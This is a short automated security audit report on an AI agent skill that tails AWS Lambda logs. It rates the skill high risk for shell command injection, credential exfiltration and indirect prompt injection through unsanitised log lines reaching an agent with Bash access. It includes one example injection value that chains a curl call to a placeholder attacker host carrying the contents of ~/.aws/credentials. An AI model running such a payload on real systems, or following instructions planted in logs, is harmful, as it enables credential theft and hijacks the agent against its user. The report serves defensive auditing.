logs

Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: HIGHCOMMAND_EXECUTIONDATA_EXFILTRATIONPROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION] (HIGH): The skill performs direct shell interpolation of the $ARGUMENTS variable in the command aws logs tail /aws/lambda/pitfal-$ARGUMENTS. An attacker can provide input like contact; curl http://attacker.com/$(cat ~/.aws/credentials) to execute arbitrary logic.
  • [DATA_EXFILTRATION] (MEDIUM): The command injection vulnerability can be leveraged to read sensitive files (e.g., AWS credentials, environment variables) and exfiltrate them via the network.
  • [PROMPT_INJECTION] (LOW): The skill is vulnerable to indirect prompt injection (Category 8) by processing untrusted data. • Ingestion points: CloudWatch log streams (SKILL.md). • Boundary markers: Absent; log lines are printed directly to the agent's context. • Capability inventory: Full Bash shell access via the Bash tool. • Sanitization: None; the skill does not escape or filter log content that may contain malicious instructions for the LLM.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 17, 2026, 06:50 PM